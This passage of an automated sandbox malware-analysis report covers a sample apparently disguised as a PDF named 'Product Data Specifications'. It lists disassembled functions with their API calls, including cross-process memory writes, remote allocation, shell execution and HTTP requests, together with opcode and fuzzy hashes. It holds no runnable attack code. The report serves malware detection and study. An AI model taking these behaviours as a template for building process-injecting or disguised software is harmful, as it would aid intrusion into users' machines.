                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                              • API String ID: 708495834-557222456
                              • Opcode ID: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                              • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                              • Opcode Fuzzy Hash: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                              • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                              Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                              • CoInitialize.OLE32(00000000), ref: 00478442
                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                              • CoUninitialize.OLE32 ref: 0047863C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                              • String ID: .lnk
                              • API String ID: 886957087-24824748
                              • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                              • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                              • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                              • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                              Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                              • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                              • String ID: @
                              • API String ID: 4150878124-2766056989
                              • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                              • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                              • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                              • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                              Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \$]$h
                              • API String ID: 4104443479-3262404753
                              • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                              • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                              • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                              • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                              Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                              Download Yara Rule
                              APIs
                              • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • CloseHandle.KERNEL32(?), ref: 00457E09
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                              • String ID: <$@
                              • API String ID: 2417854910-1426351568
                              • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                              • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                              • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                              • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                              Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                              • String ID:
                              • API String ID: 3705125965-3916222277
                              • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                              • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                              • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                              • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                              Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetMenuItemInfoW.USER32 ref: 0045FAC4
                              • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                              • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$Delete$InfoItem
                              • String ID: 0
                              • API String ID: 135850232-4108050209
                              • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                              • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                              • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                              • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                              Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                              Download Yara Rule
                              APIs
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                              • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$Long
                              • String ID: SysTreeView32
                              • API String ID: 847901565-1698111956
                              • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                              • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                              • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                              • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                              Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 00434B10
                              • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                              • FreeLibrary.KERNEL32(?), ref: 00434B9F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Library$AddressFreeLoadProc
                              • String ID: AU3_GetPluginDetails
                              • API String ID: 145871493-4132174516
                              • Opcode ID: 4f1385bb4795fe3ea514fff6b1d5a080d1b27c3bfb87bec215dc83ab5cae4363
                              • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                              • Opcode Fuzzy Hash: 4f1385bb4795fe3ea514fff6b1d5a080d1b27c3bfb87bec215dc83ab5cae4363
                              • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                              Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$Window
                              • String ID: SysMonthCal32
                              • API String ID: 2326795674-1439706946
                              • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                              • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                              • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                              • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                              Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                              Download Yara Rule
                              APIs
                              • DestroyWindow.USER32(00000000), ref: 00450A2F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DestroyWindow
                              • String ID: msctls_updown32
                              • API String ID: 3375834691-2298589950
                              • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                              • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                              • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                              • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                              Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: $<
                              • API String ID: 4104443479-428540627
                              • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                              • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                              • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                              • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                              Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                              • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                              • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                              • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                              Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                              • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                              • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                              • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                              Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                              • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                              • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                              • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                              Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
